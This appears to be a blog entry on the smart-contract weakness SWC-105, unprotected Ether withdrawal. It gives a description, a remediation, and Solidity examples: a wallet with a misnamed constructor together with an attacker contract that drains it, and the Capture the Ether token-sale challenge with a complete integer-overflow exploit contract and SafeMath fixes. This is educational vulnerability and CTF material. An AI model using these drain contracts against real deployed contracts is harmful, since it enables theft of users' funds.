05.SWC-105_Unprotected Ether Withdrawal
2023-07-13 15:50:30 # 09.SWC

SWC-105_Unprotected Ether Withdrawal

Unprotected Ether Withdrawal

  • Description: Due to missing or insufficient access controls, malicious parties can withdraw some or all Ether from the contract account.

    This bug is sometimes caused by unintentionally exposing initialization functions. In Solidity before 0.4.22 the constructor was the function whose name matched the contract's; a misspelled or mismatched name turns it into an ordinary public function, so the initialization code ends up in the runtime bytecode and anyone can call it to re-initialize the contract (for example, to make themselves the owner and then pass the owner check on a withdrawal function).

  • Remediation: Implement controls so withdrawals can only be triggered by authorized parties or according to the specs of the smart contract system.
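As an added example (not from the original page), the misnamed-constructor pattern described above and the remediation the bullet asks for, written for Solidity 0.4.24. The contract names VulnerableWallet, HardenedWallet and Attacker are hypothetical; the hardened version uses the `constructor` keyword, which cannot be misnamed, and gates withdrawal behind an `onlyOwner` modifier.

```solidity
pragma solidity ^0.4.24;

// Added example, not code from the original page. Names are hypothetical.
// Before Solidity 0.4.22 the constructor was the function sharing the
// contract's name. "vulnerableWallet" != "VulnerableWallet", so the
// initialization code is compiled into the runtime bytecode as a plain
// public function that anyone can call, at any time, to become owner.
contract VulnerableWallet {
    address public owner;

    // Intended as the constructor; actually a public function callable by anyone.
    function vulnerableWallet() public {
        owner = msg.sender;
    }

    function() public payable {}

    // The access check is present, but it trusts an owner anyone can overwrite.
    function withdraw() public {
        require(msg.sender == owner);
        owner.transfer(address(this).balance);
    }
}

// Hardened version: a real constructor plus an onlyOwner modifier on the
// withdrawal entry point, with the amount bounded by the contract balance.
contract HardenedWallet {
    address public owner;

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    constructor() public {
        owner = msg.sender;
    }

    function() public payable {}

    function withdraw(uint256 amount) public onlyOwner {
        require(amount <= address(this).balance, "insufficient balance");
        owner.transfer(amount);
    }
}

// Attacker: re-initializes the vulnerable wallet and drains it in one call.
contract Attacker {
    function drain(VulnerableWallet target) public {
        target.vulnerableWallet();                 // attacker contract becomes owner
        target.withdraw();                         // whole balance lands in this contract
        msg.sender.transfer(address(this).balance); // forward to the caller
    }

    function() public payable {}
}
```

Deploying HardenedWallet and calling `withdraw` from any account other than the deployer reverts with "not owner"; against VulnerableWallet, `Attacker.drain(target)` succeeds for any caller because the first call simply overwrites `owner`.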

Vulnerable contract 1

pragma solidity ^0.4.21;
// capturetheether ctf: https://www.levi104.com/2023/06/23/01.Capturetheether%20CTF/07.Token%20sale/
contract TokenSaleChallenge {
    mapping(address => uint256) public balanceOf;
    uint256 constant PRICE_PER_TOKEN = 1 ether;

    // Pre-0.4.22 constructor: the function that shares the contract's name.
    // The challenge is deployed holding exactly 1 ether.
    function TokenSaleChallenge(address _player) public payable {
        require(msg.value == 1 ether);
    }

    // Solved once the contract holds less than the 1 ether it started with.
    function isComplete() public view returns (bool) {
        return address(this).balance < 1 ether;
    }

    // numTokens * PRICE_PER_TOKEN is unchecked 256-bit arithmetic: a large
    // enough numTokens wraps the product to a small value, so the price check
    // passes while the buyer is credited with an enormous token balance.
    function buy(uint256 numTokens) public payable {
        require(msg.value == numTokens * PRICE_PER_TOKEN);

        balanceOf[msg.sender] += numTokens;
    }

    // Pays out 1 ether per token with no check beyond the (inflatable) balance,
    // so anyone who abused buy() can withdraw the contract's ether.
    function sell(uint256 numTokens) public {
        require(balanceOf[msg.sender] >= numTokens);

        balanceOf[msg.sender] -= numTokens;
        msg.sender.transfer(numTokens * PRICE_PER_TOKEN);
    }
}
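The route by which the ether in TokenSaleChallenge is actually withdrawn, as an added example that is not part of the original page or the CTF: in Solidity 0.4.x the product `numTokens * PRICE_PER_TOKEN` in `buy()` wraps modulo 2^256, so choosing numTokens = ceil(2^256 / 1 ether) makes the price check accept about 0.416 ether while crediting the caller with that enormous balance, which `sell()` then pays out at 1 ether per token. The `TokenSaleExploit` contract and the `ITokenSaleChallenge` interface are assumed names; the `SafeMath` library and `HardenedTokenSale` show the checked multiplication that rejects the same call.

```solidity
pragma solidity ^0.4.21;

// Added example, not code from the original page or the CTF.
// Interface mirroring the public functions of TokenSaleChallenge (assumed name).
interface ITokenSaleChallenge {
    function buy(uint256 numTokens) external payable;
    function sell(uint256 numTokens) external;
    function isComplete() external view returns (bool);
}

contract TokenSaleExploit {
    // ceil(2**256 / 1e18): the smallest numTokens whose price wraps past 2**256.
    // 2**256 mod 1e18 = 584007913129639936, so the wrapped product is
    // 1e18 - 584007913129639936 = 415992086870360064 wei (about 0.416 ether).
    uint256 constant NUM_TOKENS = 115792089237316195423570985008687907853269984665640564039458;
    uint256 constant WRAPPED_PRICE = 415992086870360064;

    // Call with exactly WRAPPED_PRICE wei attached.
    function attack(ITokenSaleChallenge target) public payable {
        require(msg.value == WRAPPED_PRICE);
        // buy() requires msg.value == numTokens * 1 ether; the product overflows
        // to WRAPPED_PRICE, so the check passes and we hold NUM_TOKENS tokens.
        target.buy.value(msg.value)(NUM_TOKENS);
        // Selling one token pays 1 ether out of the contract's ~1.416 ether,
        // leaving ~0.416 ether, which satisfies isComplete().
        target.sell(1);
        require(target.isComplete());
        msg.sender.transfer(address(this).balance);
    }

    // Needed to receive the 1 ether paid out by sell().
    function() public payable {}
}

// Checked multiplication: reverts on overflow instead of wrapping.
library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256 c) {
        if (a == 0) return 0;
        c = a * b;
        require(c / a == b);
        return c;
    }
}

// Same sale logic with checked arithmetic: buy(NUM_TOKENS) reverts here,
// so the balance that sell() pays out can never be inflated.
contract HardenedTokenSale {
    using SafeMath for uint256;

    mapping(address => uint256) public balanceOf;
    uint256 constant PRICE_PER_TOKEN = 1 ether;

    function buy(uint256 numTokens) public payable {
        require(msg.value == numTokens.mul(PRICE_PER_TOKEN));
        balanceOf[msg.sender] += numTokens;
    }

    function sell(uint256 numTokens) public {
        require(balanceOf[msg.sender] >= numTokens);
        balanceOf[msg.sender] -= numTokens;
        msg.sender.transfer(numTokens.mul(PRICE_PER_TOKEN));
    }
}
```

Against the challenge as deployed (1 ether in the constructor), `attack` costs 415992086870360064 wei and returns 1 ether to the caller, so the attacker nets roughly 0.584 ether and `isComplete()` flips to true; against HardenedTokenSale the same `buy` call reverts inside `SafeMath.mul`. Solidity 0.8 and later performs this overflow check on every arithmetic operation by default.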

Vulnerable contract …………
